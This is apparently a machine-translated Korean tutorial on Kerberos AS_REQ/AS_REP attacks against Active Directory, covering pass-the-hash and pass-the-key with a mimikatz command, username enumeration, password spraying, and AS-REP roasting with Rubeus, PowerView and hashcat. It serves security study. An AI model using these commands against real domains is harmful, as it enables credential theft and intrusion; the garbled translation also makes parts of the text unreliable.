AS_REQ & AS_REP로 인한 보안 문제

4043 단어 Kerberos
위에서 AS를 강의하였다REQ & AS_REP의 프로세스 및 필드에 대한 설명입니다.본고는 그 중에서 생산되는 문제와 어떻게 이용하는지를 설명할 것이다.
Pass The Hash & Pass The Key
ASREQ에서 사용자hash로 시간 스탬프를 암호화하기 때문에 명문 없이 pth와 ptk로 인증하여 어음을 받을 수 있습니다.
pth는 공연을 하지 않습니다. ntlm hash로 하면 됩니다. kb2871997을 보충한 후에 ptk를 사용할 수 있습니다.이 보충 구체적인 역할 참고https://blog.csdn.net/Ping_Pig/article/details/109171690선mark
ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.
sekurlsa::ekeys
sekurlsa::pth /user:testadmin /domain:test.local /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c
사용자 이름 올리기
호명이 존재하지 않을 때

사용자 이름이 잘못된 경우

공구.
msf auxiliary/gather/kerberos_enumusers
java –jar kerbguess.jar –r [domain] –d [user list] –s [DC IP]
nmap –p 88 –script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]
암호 분사
비밀번호가 정확하지 않을 때

비밀번호가 정확할 때

소량의 비밀번호를 통해 대량의 사용 계좌를 폭파하여 계좌 잠금을 피하다.
도구https://github.com/dafthack/DomainPasswordSpray
AS-REPRoasting
도메인 사용자에 대해 "Do not require Kerberos proeauthentication"옵션을 설정하면 도메인 컨트롤러의 88 포트에 AS-REQ 요청을 보내고 받은 AS-REAP 내용을 다시 조합하여 "Kerberos5 AS-REAP etype23"(18200) 형식으로 연결할 수 있으며 hashcat을 사용하여 이를 해독하여 최종적으로 사용자의 명문 구령을 받을 수 있다.
사용 전제: 도메인 사용자가 선택 항목 "Do not require Kerberos proeauthentication"을 설정합니다.일반적으로 이 선택 항목의 침묵은 열리지 않습니다.

활용단어참조
Rubeus.exe asreproast
도메인 계정 또는 장치 계정이 실행되어야 합니다.

해시캣에 던지시면 됩니다.
파워뷰에서 선택 사항 사용자를 깨우치는 모듈이 있습니다.
Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired -Verbose
황금 어음
은표와 함께 정하다
참고 자료
  • https://www.catalog.update.microsoft.com/Search.aspx?q=KB2871997
  • https://daiker.gitbook.io/windows-protocol/kerberos/1
  • https://blog.csdn.net/Ping_Pig/article/details/109171690
  • 영역 침투 - AS-REATING
  • https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
  • 좋은 웹페이지 즐겨찾기